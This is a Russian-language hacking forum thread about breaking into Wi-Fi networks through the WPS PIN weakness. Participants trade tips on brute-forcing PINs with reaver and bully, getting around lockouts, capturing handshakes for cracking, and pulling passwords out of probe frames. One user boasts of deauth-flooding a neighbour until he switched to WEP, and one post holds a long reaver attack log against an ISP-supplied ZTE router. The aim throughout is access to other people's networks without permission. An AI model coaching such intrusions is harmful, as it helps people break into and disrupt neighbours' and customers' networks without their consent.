Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    4Fun and binarymaster like this.
  2. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Пару слов о том, что я писал выше, вернее, о результатах) Т. к. ситуация была безысходной, продолжительный дудос соседа deauth пакетами вынудил его сменить защиту на WEP) Так что теперь у меня и доступ есть, и пин записан.
     
  3. Goldstein

    Goldstein New Member

    Joined:
    4 Feb 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Точка TL-WR720N. Брутил wps через reaver. После примерно ~500 попыток стало происходить странное.... После "Sending M2 message" появился таймаут. Это точка зависла или система защиты такая??? Поможет ли ребут?
     
  4. fire-dance

    fire-dance Elder - Старейшина

    Joined:
    12 May 2015
    Messages:
    1,000
    Likes Received:
    665
    Reputations:
    12
    скорей всего слабый сигнал пошел и ошибка сбилось, сохраняйте сесию, ночью как правило сигнал и ривер лутше
     
  5. Goldstein

    Goldstein New Member

    Joined:
    4 Feb 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    сессию сохранил. вообщем глюк точки. Пришлось зафлудить её и после рестарта процесс пошёл )
     
  6. Alvinng

    Alvinng Member

    Joined:
    26 Jan 2016
    Messages:
    78
    Likes Received:
    5
    Reputations:
    0
    Есть роутер BSSID: SAGEMCOM_ХХХХ. WPS лочится после 10 попыток, анлок только после ребута. Можно поставить в ривере задержку после 9-ти попыток? И на какое время ставить?
     
  7. Mednik

    Mednik Member

    Joined:
    23 Nov 2015
    Messages:
    153
    Likes Received:
    71
    Reputations:
    1
    В посте № 3299 попробуй команду может пройдет.
     
  8. Alvinng

    Alvinng Member

    Joined:
    26 Jan 2016
    Messages:
    78
    Likes Received:
    5
    Reputations:
    0
    WARNING: Detected AP rate limiting, waiting 7205 seconds before re-checking
    i7 3630QM, 8 Gb RAM, Nvidia GT650M
     
    #3308 Alvinng, 25 Mar 2016
    Last edited: 25 Mar 2016
  9. V777

    V777 Elder - Старейшина

    Joined:
    12 May 2015
    Messages:
    1,326
    Likes Received:
    3,181
    Reputations:
    24
    закинь сюда свой хендшейк https://forum.antichat.ru/threads/417617/ или сюда https://forum.antichat.ru/threads/435763/ ... И не забудь сказать спасибо )))
     
  10. Alvinng

    Alvinng Member

    Joined:
    26 Jan 2016
    Messages:
    78
    Likes Received:
    5
    Reputations:
    0
  11. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Ростелеком начал ставить роутеры ZTE ZXHN H118N c bssid D4:76:EA... WPS включен, но при попытке сбрутить принимает первую половину кода, какой бы она ни была, а дальше отбивает все попытки подобрать вторую часть. Не выходит, даже если брутить подряд без учета контрольной цифры. Атака Pixie не срабатывает. Точка находится очень близко, сигнал отличный, адаптер TP-Link TL-WN7200ND, в бою многократно проверен, ОС Kali 2.0. Какие у кого есть мысли? Кто-нибудь сталкивался?
     
  12. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Для начала надо поймать пару хендшейков с таких роутеров, выложить в тему перебора паролей, если удастся сбрутить думаю там будут стоять как всегда идентичные пароли, Ростелеком в этом давно замечен. Потом будет от чего отталкиваться.
     
    Alexmeh likes this.
  13. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    или пароли, сгенеренные по известному алгоритму, как это с дурдом.ру-шными роутерами было) zte - оно ж дырявое по самое нехочу
     
  14. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Похоже новую ревизию выпустили, такая серия MAC-адресов ни в гугле, ни в shodan не светится. Хендшейк пока проблематично словить - за 4 дня работы роутера ни одного коннекта. Ощущение, что там просто не знают, как поженить с ним свои смартфоны...
     
  15. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Вот фрагмент брута. Странно, что повторы по 45 раз...

    +] p2_index set to 503
    [+] Pin count advanced: 10503. Max pin attempts: 11000
    [+] 95.48% complete. Elapsed time: 0d1h29m42s.
    [+] Estimated Remaining time: 0d1h14m33s
    [+] Trying pin 13414979.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6a:4c:3d:a7:7f:dc:82:cd:26:48:1a:40:33:2e:f7:e3
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: ZTE Corporation
    [P] WPS Model Name: ZXHN H118N
    [P] WPS Model Number: ZXHN H118N
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:10:53:c9:9c:6d:35:60:0b:7d:21:e6:a5:0a:2b:41
    [P] PKR: e6:a7:01:87:ad:02:1c:39:76:8d:93:24:fe:75:56:ae:60:b9:4a:40:61:84:a2:ec:58:97:25:41:9b:45:37:94:bf:92:55:bf:68:19:ab:db:8a:ff:4f:51:7d:84:a6:e6:62:b8:7d:6e:9d:85:84:d5:35:59:5a:88:42:7f:85:af:7f:93:f4:b3:4b:63:53:66:57:83:b4:0d:97:38:8e:c0:c4:04:c5:c5:ea:4a:d5:81:93:f9:62:e2:ab:58:9f:7b:47:3f:df:32:a7:db:cc:d1:6e:f4:47:84:3b:55:b6:88:9f:39:17:34:b0:b0:e2:88:7d:0f:b9:a6:a4:c3:25:5c:73:98:c4:44:0f:80:fd:43:38:04:89:3c:e1:d0:22:b8:9f:52:05:c6:c9:b7:27:71:58:45:d9:3b:ea:37:58:66:60:0f:0b:48:09:64:6b:78:50:2d:91:10:0d:71:a0:ae:80:90:79:d0:4f:e9:b7:30:8c:1b:cc:de:a8:f3:47:c1
    [P] AuthKey: 0b:41:30:67:63:e8:73:b9:2f:16:bd:fb:ad:bd:ac:37:f7:5f:7b:00:53:7a:92:81:27:59:15:13:ca:df:54:56
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
    [P] E-Hash2: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Received M5 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK

    Ростелеком у нас взял за привычку прописывать 12-значные цифровые пароли. Это я на своей телеге его месяц брутить буду.
     
    #3315 startless, 11 Apr 2016
    Last edited: 11 Apr 2016
  16. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    он не принимает первую часть кода, он неправильно завершает eapol сессию, а ривер думает, что первая половина прошла успешно. и не может подобрать вторую, так как первая неправильная тоже.
     
  17. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    И что посоветуете? Как его поиметь? Я уже, кажется, все варианты ключей перепробовал. С задержками может поиграть? Bully его вообще не берет, крутит один и тот же пин бесконечно...
     
  18. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Я же говорил выложите хендшейк в тему бесплатного подбора пароля.
     
  19. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Контрольный проход по взломанным точкам подтверждает, что адаптер работает как надо. Открылись другие подробности - Airodump обнаружил версию WPS 1.0 PBC, то бишь запуск WPS с кнопки. Может потому атака reaver безуспешна?
     
  20. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    При продолжительной работе airodump-а случайно обнаружил, что, порой, в поле "Probe" проскакивает заветный пароль! Похоже, что кто-то забивает его качестве названия своего устройства. Уже три таких попалось... Получается, что просто запускаешь airodump и слушаешь эфир. Потом внимательно изучаешь ассоциацию клиентов и AP и пробуешь пароль - он обычно выделяется на фоне просто названий AP и устройств.
     
    erwerr2321 and binarymaster like this.